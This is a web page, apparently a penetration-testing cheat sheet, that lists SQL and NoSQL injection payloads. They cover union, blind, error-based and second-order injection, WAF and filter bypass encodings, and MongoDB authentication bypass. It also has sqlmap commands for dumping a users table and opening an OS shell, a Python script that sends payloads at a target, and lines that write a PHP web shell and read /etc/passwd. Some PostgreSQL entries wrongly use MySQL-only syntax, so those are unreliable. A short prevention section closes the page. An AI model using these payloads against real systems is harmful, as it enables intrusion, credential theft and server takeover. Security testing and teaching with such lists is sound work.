Database

SQL Injection Payloads Comprehensive collection of SQL injection payloads and bypass techniques for penetration testing. Basic SQL Injection Union-based Injection -- Basic UNION ' UNION SELECT 1,2,3-- ' UNION SELECT NULL,NULL,NULL-- ' UNION SELECT 1,2,3,4,5-- -- With column names ' UNION SELECT username,password,email FROM users-- ' UNION SELECT table_name,column_name FROM information_schema.columns-- -- Multiple columns ' UNION SELECT 1,2,3,4,5,6,7,8,9,10-- Boolean-based Blind Injection -- Basic boolean tests ' OR 1=1-- ' OR '1'='1 ' OR 1=1# ' OR 1=1/* -- Conditional statements ' AND 1=1-- ' AND 1=2-- ' AND (SELECT COUNT(*) FROM users) > 0-- ' AND (SELECT LENGTH(username) FROM users LIMIT 1) > 5-- Time-based Blind Injection -- MySQL ' AND SLEEP(5)-- ' AND (SELECT SLEEP(5))-- ' AND IF(1=1,SLEEP(5),0)-- -- PostgreSQL '; SELECT pg_sleep(5)-- ' AND (SELECT pg_sleep(5))-- -- MSSQL '; WAITFOR DELAY '00:00:05'-- ' AND (SELECT COUNT(*) FROM sys.tables) > 0; WAITFOR DELAY '00:00:05'-- -- Oracle ' AND (SELECT COUNT(*) FROM all_tables) > 0 AND DBMS_LOCK.SLEEP(5)-- Database-specific Payloads MySQL -- Version detection ' UNION SELECT @@version-- ' UNION SELECT VERSION()-- -- Database enumeration ' UNION SELECT SCHEMA_NAME FROM information_schema.schemata-- ' UNION SELECT TABLE_NAME FROM information_schema.tables WHERE TABLE_SCHEMA=DATABASE()-- -- User enumeration ' UNION SELECT USER()-- ' UNION SELECT CURRENT_USER()-- ' UNION SELECT user,host FROM mysql.user-- -- File operations ' UNION SELECT LOAD_FILE('/etc/passwd')-- ' UNION SELECT '<?php system($_GET[cmd]); ?>' INTO OUTFILE '/var/www/shell.php'-- PostgreSQL -- Version detection ' UNION SELECT version()-- -- Database enumeration ' UNION SELECT datname FROM pg_database-- ' UNION SELECT tablename FROM pg_tables-- -- User enumeration ' UNION SELECT current_user-- ' UNION SELECT usename FROM pg_user-- -- File operations ' UNION SELECT pg_read_file('/etc/passwd')-- ' UNION SELECT '<?php system($_GET[cmd]); ?>' INTO OUTFILE '/var/www/shell.php'-- MSSQL -- Version detection ' UNION SELECT @@version-- ' UNION SELECT SERVERPROPERTY('productversion')-- -- Database enumeration ' UNION SELECT name FROM sys.databases-- ' UNION SELECT table_name FROM information_schema.tables-- -- User enumeration ' UNION SELECT SYSTEM_USER-- ' UNION SELECT USER_NAME()-- ' UNION SELECT name FROM sys.server_principals-- -- File operations ' UNION SELECT * FROM OPENROWSET('BULK','C:\\Windows\\System32\\drivers\\etc\\hosts','SINGLE_CLOB') AS x-- Oracle -- Version detection ' UNION SELECT banner FROM v$version-- ' UNION SELECT version FROM v$instance-- -- Database enumeration ' UNION SELECT table_name FROM all_tables-- ' UNION SELECT column_name FROM all_tab_columns WHERE table_name='USERS'-- -- User enumeration ' UNION SELECT user FROM dual-- ' UNION SELECT username FROM all_users-- -- File operations ' UNION SELECT UTL_FILE.FREAD('DIRECTORY','filename') FROM dual-- Advanced Bypass Techniques WAF Bypass -- Comment variations '/**/UNION/**/SELECT/**/1,2,3-- '/*!UNION*//*!SELECT*/1,2,3-- '%0AUNION%0ASELECT%0A1,2,3-- -- Case variation ' UnIoN SeLeCt 1,2,3-- ' uNiOn sElEcT 1,2,3-- -- Encoding bypass ' %55%4e%49%4f%4e %53%45%4c%45%43%54 1,2,3-- ' %55nion %53elect 1,2,3-- -- Double encoding ' %2555%254e%2549%254f%254e %2553%2545%254c%2545%2543%2554 1,2,3-- Filter Bypass -- Space replacement '/**/UNION/**/SELECT/**/1,2,3-- '%09UNION%09SELECT%091,2,3-- '%0AUNION%0ASELECT%0A1,2,3-- '%0DUNION%0DSELECT%0D1,2,3-- '%0CUNION%0CSELECT%0C1,2,3-- '%0BUNION%0BSELECT%0B1,2,3-- -- Keyword replacement ' UNI/**/ON SEL/**/ECT 1,2,3-- ' UNI%00ON SEL%00ECT 1,2,3-- ' UNI%0aON SEL%0aECT 1,2,3-- Quote Bypass -- Without quotes ' OR 1=1-- ' OR 1=1# ' OR 1=1/* -- With different quote types ' OR "1"="1-- ' OR '1'='1-- ' OR `1`=`1-- -- Hex encoding ' OR 0x31=0x31-- ' OR CHAR(49)=CHAR(49)-- Error-based Injection MySQL Error-based -- Extract database name ' AND extractvalue(1,concat(0x7e,(SELECT database()),0x7e))-- ' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)-- -- Extract table names ' AND extractvalue(1,concat(0x7e,(SELECT table_name FROM information_schema.tables LIMIT 1),0x7e))-- -- Extract column names ' AND extractvalue(1,concat(0x7e,(SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1),0x7e))-- PostgreSQL Error-based -- Extract database name ' AND (SELECT * FROM (SELECT COUNT(*),CONCAT((SELECT database()),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -- Extract table names ' AND (SELECT * FROM (SELECT COUNT(*),CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)-- Second-order SQL Injection User Registration -- Username field admin'-- admin'/* admin'# -- Email field admin@test.com'-- admin@test.com'/* admin@test.com'# Profile Update -- Name field ' OR 1=1-- ' OR '1'='1 ' OR 1=1# -- Bio field ' UNION SELECT username,password FROM users-- ' UNION SELECT 1,2,3-- NoSQL Injection MongoDB // Basic injection {"$ne": null} {"$gt": ""} {"$regex": ".*"} // Authentication bypass {"username": {"$ne": null}, "password": {"$ne": null}} {"username": {"$gt": ""}, "password": {"$gt": ""}} // Data extraction {"$where": "this.username.match(/.*/)"} {"$where": "this.password.match(/.*/)"} CouchDB // Basic injection {"$ne": null} {"$gt": ""} // Authentication bypass {"username": {"$ne": null}, "password": {"$ne": null}} Automated Tools SQLMap Commands # Basic scan sqlmap -u "http://target.com/page.php?id=1" # With POST data sqlmap -u "http://target.com/login.php" --data="username=admin&password=admin" # With cookies sqlmap -u "http://target.com/page.php?id=1" --cookie="PHPSESSID=abc123" # Database enumeration sqlmap -u "http://target.com/page.php?id=1" --dbs sqlmap -u "http://target.com/page.php?id=1" --tables sqlmap -u "http://target.com/page.php?id=1" --columns -T users sqlmap -u "http://target.com/page.php?id=1" --dump -T users # OS shell sqlmap -u "http://target.com/page.php?id=1" --os-shell Custom Scripts # Python SQL injection tester import requests import time def test_sql_injection(url, param, payload): data = {param: payload} start_time = time.time() response = requests.post(url, data=data) end_time = time.time() if end_time - start_time > 4: print(f"Time-based injection detected: {payload}") elif "error" in response.text.lower(): print(f"Error-based injection detected: {payload}") elif "success" in response.text.lower(): print(f"Boolean-based injection detected: {payload}") # Test payloads payloads = [ "' OR 1=1--", "' UNION SELECT 1,2,3--", "' AND SLEEP(5)--", "' OR '1'='1" ] for payload in payloads: test_sql_injection("http://target.com/login.php", "username", payload) Prevention and Mitigation Parameterized Queries # Python example cursor.execute("SELECT * FROM users WHERE username = %s AND password = %s", (username, password)) # PHP example $stmt = $pdo->prepare("SELECT * FROM users WHERE username = ? AND password = ?"); $stmt->execute([$username, $password]); Input Validation # Whitelist validation allowed_chars = set('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') if not set(username).issubset(allowed_chars): return "Invalid username" # Length validation if len(username) > 50: return "Username too long" Testing Checklist Test all input fields Test with different HTTP methods (GET, POST, PUT, DELETE) Test with different content types (application/x-www-form-urlencoded, application/json) Test with different encodings (URL, Base64, Hex) Test with different quote types (single, double, backtick) Test with different comment styles (–, #, /* */) Test with different space replacements Test with different case variations Test with different encoding bypasses Test with different WAF bypass techniques